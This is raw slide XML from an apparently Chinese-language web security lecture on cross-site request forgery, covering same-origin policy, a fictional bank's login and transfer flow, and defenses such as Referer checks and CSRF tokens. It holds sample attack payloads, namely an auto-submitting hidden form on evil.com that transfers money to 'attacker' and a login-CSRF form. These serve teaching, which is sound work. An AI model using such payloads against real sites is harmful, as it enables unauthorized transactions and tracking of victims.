              <a:t>cookie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FBD4F-9BCE-B243-B585-6DCE9880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34918"/>
            <a:ext cx="8075543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1F6B1-DE81-884C-9C88-234C01BF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2033749"/>
            <a:ext cx="7855173" cy="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26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跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF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  <a:endParaRPr lang="en-HK" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>引诱受害者浏览器访问特定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，实施攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>避免了盗取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的麻烦</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>滥用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>所有到源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>D*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的请求应包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> D*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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HTML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1038846" y="1877841"/>
            <a:ext cx="8543925" cy="37838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C79C24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&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1463" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C79C24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doctype</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1463" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C79C24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html&gt;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&lt;html&gt;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&lt;head&gt;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&lt;title&gt;</a:t>
            </a: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Hello World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&lt;/title&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;h1&gt;</a:t>
            </a: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Hello World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&lt;/h1&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1463" dirty="0">
              <a:solidFill>
                <a:srgbClr val="35A327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		  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1463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img</a:t>
            </a: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463" dirty="0" err="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1463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“/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1463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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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/my_face.jpg"</a:t>
            </a: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&gt;&lt;/img&gt;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&lt;p&gt;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    I am 12 and what is</a:t>
            </a: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&lt;a</a:t>
            </a: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sz="1463" dirty="0" err="1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href</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1463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lang="en-US"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wierd_thing.html</a:t>
            </a:r>
            <a:r>
              <a:rPr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"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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1463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this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&lt;/a&gt;</a:t>
            </a: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?</a:t>
            </a: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&lt;/p&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1463" dirty="0">
              <a:solidFill>
                <a:srgbClr val="35A327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    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1463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img</a:t>
            </a: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463" dirty="0" err="1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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1463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463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“http://www.images.com/cats/adorablekitten.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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&gt;&lt;/img&gt;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   </a:t>
            </a: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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1463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Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="195888">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="152358" algn="l"/>
                <a:tab pos="304715" algn="l"/>
                <a:tab pos="457072" algn="l"/>
                <a:tab pos="609429" algn="l"/>
                <a:tab pos="761787" algn="l"/>
                <a:tab pos="914145" algn="l"/>
                <a:tab pos="1066501" algn="l"/>
                <a:tab pos="1218859" algn="l"/>
                <a:tab pos="1371216" algn="l"/>
                <a:tab pos="1523574" algn="l"/>
                <a:tab pos="1675931" algn="l"/>
                <a:tab pos="1828288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1463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&lt;/html&gt;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4106025" y="2633299"/>
            <a:ext cx="2409566" cy="660109"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -48871"/>
              <a:gd name="adj2" fmla="val 1157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HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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可以嵌入站点内部的其它资源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357403" y="3753611"/>
            <a:ext cx="2760962" cy="576823"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46218"/>
              <a:gd name="adj2" fmla="val 1425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或者其外部的资源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问题站点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8545" y="2185431"/>
            <a:ext cx="8526236" cy="3320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omic Sans MS" panose="030F09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4572" y="2291567"/>
            <a:ext cx="232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mic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Bank of Washington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3190">
            <a:off x="3079513" y="2319873"/>
            <a:ext cx="579642" cy="31128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116147" y="2317937"/>
            <a:ext cx="1981200" cy="3067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902030302020204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29480" y="2317937"/>
            <a:ext cx="267867" cy="30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9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10149"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1443509" y="2919726"/>
          <a:ext cx="7130538" cy="3998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86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Transfer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Invest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Learn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Locations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Contact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12631" y="2317937"/>
            <a:ext cx="1895071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902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Welcome, Christo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5544" y="3645241"/>
            <a:ext cx="5635710" cy="1706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latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Transfer Money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7168" y="4221488"/>
            <a:ext cx="117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omic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>To: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97169" y="4727923"/>
            <a:ext cx="117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omic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Amount: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85629" y="4240531"/>
            <a:ext cx="2197323" cy="33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9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85628" y="4766982"/>
            <a:ext cx="2197323" cy="337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omic Sans MS" panose="030F0902030302020204" pitchFamily="66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19029" y="4739497"/>
            <a:ext cx="1214005" cy="391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mic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0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2829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2653" y="985344"/>
            <a:ext cx="1701647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浏览器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2104" y="982780"/>
            <a:ext cx="1701647" cy="392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786251" y="1389389"/>
            <a:ext cx="4266206" cy="317459"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="390718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812374" y="3745695"/>
              <a:ext cx="5250715" cy="2378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56785" y="3387776"/>
              <a:ext cx="3650309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GET /login_form.html HTTP/1.1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86250" y="1800031"/>
            <a:ext cx="4259768" cy="317459"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="390719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3780935" y="3774593"/>
              <a:ext cx="524279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328199" y="3387776"/>
              <a:ext cx="2107480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HTTP/1.1 200 OK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86251" y="2675910"/>
            <a:ext cx="4266206" cy="317459"/>
            <a:chOff x="3812375" y="3387776"/>
            <a:chExt cx="5250715" cy="390718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812375" y="3745695"/>
              <a:ext cx="5250715" cy="2378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863577" y="3387776"/>
              <a:ext cx="3036729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POST /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1463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login.php</a:t>
              </a:r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 HTTP/1.1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78693" y="3108138"/>
            <a:ext cx="5041765" cy="556091"/>
            <a:chOff x="3279327" y="3340286"/>
            <a:chExt cx="6205250" cy="373249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3732253" y="3713535"/>
              <a:ext cx="529147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9327" y="3340286"/>
              <a:ext cx="6205250" cy="364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HTTP/1.1 302 Found</a:t>
              </a:r>
            </a:p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Set-Cookie: session=3#4fH8d%dA1; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1463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HttpOnly</a:t>
              </a:r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; Secure;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9368" y="3936416"/>
            <a:ext cx="4266206" cy="542583"/>
            <a:chOff x="3812377" y="3469443"/>
            <a:chExt cx="5250715" cy="28849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812377" y="3745696"/>
              <a:ext cx="5250715" cy="297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88722" y="3469443"/>
              <a:ext cx="3786441" cy="288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GET /money_xfer.html HTTP/1.1</a:t>
              </a:r>
            </a:p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Cookie: session=3#4fH8d%dA1;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8" y="760667"/>
            <a:ext cx="816747" cy="81674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799589" y="4556831"/>
            <a:ext cx="4259768" cy="317459"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="390719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3780935" y="3774593"/>
              <a:ext cx="5242791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28199" y="3387776"/>
              <a:ext cx="2107480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HTTP/1.1 200 OK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93151" y="5125237"/>
            <a:ext cx="4266206" cy="542584"/>
            <a:chOff x="3820299" y="3219826"/>
            <a:chExt cx="5250715" cy="66779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820299" y="3862997"/>
              <a:ext cx="5250715" cy="2378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546922" y="3219826"/>
              <a:ext cx="3670038" cy="667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POST /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1463" dirty="0" err="1">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>xfer.php</a:t>
              </a:r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 HTTP/1.1</a:t>
              </a:r>
            </a:p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Cookie: session=3#4fH8d%dA1;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733817" y="5764676"/>
            <a:ext cx="4299323" cy="317459"/>
            <a:chOff x="3715834" y="3387776"/>
            <a:chExt cx="5291475" cy="213079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3715834" y="3589191"/>
              <a:ext cx="529147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170377" y="3387776"/>
              <a:ext cx="2423150" cy="213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HTTP/1.1 302 Found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061" y="851488"/>
            <a:ext cx="725925" cy="725925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Left Brace 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2377945" y="2814514"/>
            <a:ext cx="267867" cy="89625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6" name="Left Brace 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2377945" y="1565317"/>
            <a:ext cx="267867" cy="89962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2377945" y="5113434"/>
            <a:ext cx="267867" cy="98789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2377945" y="4060335"/>
            <a:ext cx="267867" cy="845269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9268" y="1727551"/>
            <a:ext cx="207630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arenR"/>
            </a:pP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GET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登录页面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9268" y="2724992"/>
            <a:ext cx="2225032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arenR" startAt="2"/>
            </a:pP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POST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用户名、密码，取得</a:t>
            </a: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cookie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267" y="4198988"/>
            <a:ext cx="207630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arenR" startAt="3"/>
            </a:pP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GET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转账页面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266" y="5319803"/>
            <a:ext cx="2076309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arenR" startAt="4"/>
            </a:pPr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POST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转账请求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0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CSRF攻击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假设受害者登录了www.bofw.com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85" y="4574740"/>
            <a:ext cx="816747" cy="8167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57587" y="5458540"/>
            <a:ext cx="2467342" cy="592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902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Origin: www.bofw.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>session=3#4fH8d%dA1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058543" y="4416139"/>
            <a:ext cx="1162215" cy="1241911"/>
            <a:chOff x="7716767" y="2349795"/>
            <a:chExt cx="1430418" cy="1528505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7716767" y="3456884"/>
              <a:ext cx="1162447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902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>evil.com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1268" y="2549659"/>
              <a:ext cx="893446" cy="89344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5303" y="2349795"/>
              <a:ext cx="641882" cy="641882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04" y="4477256"/>
            <a:ext cx="1011714" cy="101171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71911" y="2178048"/>
            <a:ext cx="2133651" cy="1435938"/>
            <a:chOff x="8664535" y="2688229"/>
            <a:chExt cx="2626032" cy="176730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550" y="3094062"/>
              <a:ext cx="893446" cy="89344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664535" y="4034121"/>
              <a:ext cx="1145482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/>
                <a:t>bofw.com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90550" y="2688229"/>
              <a:ext cx="2500017" cy="390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3" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>Bank of Washington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3190">
              <a:off x="9838137" y="3059225"/>
              <a:ext cx="440390" cy="236506"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4710126" y="2211910"/>
            <a:ext cx="4999461" cy="1944281"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14274"/>
              <a:gd name="adj2" fmla="val 6724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&lt;form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action=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"https://bofw.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400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xfer.php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&gt;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&lt;input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type=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"hidden"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name=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"to“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value=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"attacker"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&gt;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&lt;input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type=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"hidden"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name=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"amount“</a:t>
            </a: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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="140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"1000000"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&gt;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&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400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41756">
              <a:tabLst>
                <a:tab pos="257969" algn="l"/>
                <a:tab pos="526256" algn="l"/>
                <a:tab pos="794544" algn="l"/>
                <a:tab pos="1062831" algn="l"/>
                <a:tab pos="1320800" algn="l"/>
                <a:tab pos="1589088" algn="l"/>
                <a:tab pos="1857375" algn="l"/>
                <a:tab pos="2125663" algn="l"/>
                <a:tab pos="2383631" algn="l"/>
                <a:tab pos="2651919" algn="l"/>
                <a:tab pos="2920206" algn="l"/>
                <a:tab pos="3188494" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="140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.forms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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="140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lang="en-US" sz="140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].submit();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="35A327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48218" y="4698935"/>
            <a:ext cx="2113211" cy="329505"/>
            <a:chOff x="1413191" y="4991997"/>
            <a:chExt cx="2600876" cy="40554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413191" y="5397541"/>
              <a:ext cx="254547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510028" y="4991997"/>
              <a:ext cx="2504039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1) Send malicious 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48088" y="4475841"/>
            <a:ext cx="1902258" cy="322562"/>
            <a:chOff x="5105339" y="4717419"/>
            <a:chExt cx="2341240" cy="396999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5105339" y="5114417"/>
              <a:ext cx="234124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878252" y="4717419"/>
              <a:ext cx="980939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2) GET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114256" y="5036697"/>
            <a:ext cx="2117838" cy="321916"/>
            <a:chOff x="5063700" y="5539083"/>
            <a:chExt cx="2606570" cy="396204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5063700" y="5539083"/>
              <a:ext cx="2382880" cy="134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68824" y="5544569"/>
              <a:ext cx="2401446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3) HTTP/1.1 200 OK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516772" y="3178479"/>
            <a:ext cx="2170787" cy="1371616"/>
            <a:chOff x="1866797" y="3120666"/>
            <a:chExt cx="2671738" cy="1688143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2128015" y="3120666"/>
              <a:ext cx="2239186" cy="168814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2218948">
              <a:off x="1866797" y="4003651"/>
              <a:ext cx="2671738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4) POST, session=3#...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19217" y="2990414"/>
            <a:ext cx="2207656" cy="1462527"/>
            <a:chOff x="2239036" y="2889202"/>
            <a:chExt cx="2717115" cy="1800033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286524" y="2889202"/>
              <a:ext cx="2447913" cy="18000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2196168">
              <a:off x="2239036" y="3406403"/>
              <a:ext cx="2717115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902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>5) HTTP/1.1 302 Found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24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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSRF收集信息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&lt;form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action=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"https://victim-app.io/login"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&lt;input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name=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"user"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value=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"attacker"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&lt;input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name=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"password"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195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value=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"blah23"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&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="195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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0" err="1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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="195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.forms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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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0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].submit();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诱导受害者以黑客身份登录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以查看被攻击者做了哪些事情</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索记录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浏览记录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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08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预防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击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1866" indent="-371475">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>检查</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用浏览器自动添加的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Referer HTTP header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可能会有误报</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="391866" indent="-371475">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器对所有表格插入随机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>tokens</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提交的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>responses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>必须使用相应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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HTTP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lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浏览器发送请求时附带链接来源信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比如点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索引擎</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="975" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-68192" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer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https://google.com/search?q=whatever</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-68192" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1056" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>三种可能性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来源：正当站点，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://www.bofw.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来源：恶意站点，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://evil.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来源：空</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>严格：仅接受特定来源的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>宽松：接受来源为空或特定来源的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求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Referer副作用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：泄露隐私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查看某名人的维基百科访问记录，发现一条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Referer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http://int.cia.gov/projects/hitlist.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>阻止方法：如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代理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28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Tokens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&lt;form</a:t>
            </a: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24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action=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"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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xfer.php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</a:t>
            </a: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24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// ...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   </a:t>
            </a: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&lt;input</a:t>
            </a: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24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type=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"hidden“</a:t>
            </a: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24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name=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"CSRF_TOKEN“</a:t>
            </a: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					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="240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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25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value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="240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"Ko7bgbjYr2+nqO7J7zIKbQ=="</a:t>
            </a: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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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240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  <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E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  <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="813" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>所有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求都需要提交一个安全码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防止攻击者脚本窃取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者不能破解、预测安全码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现方式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>重写应用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
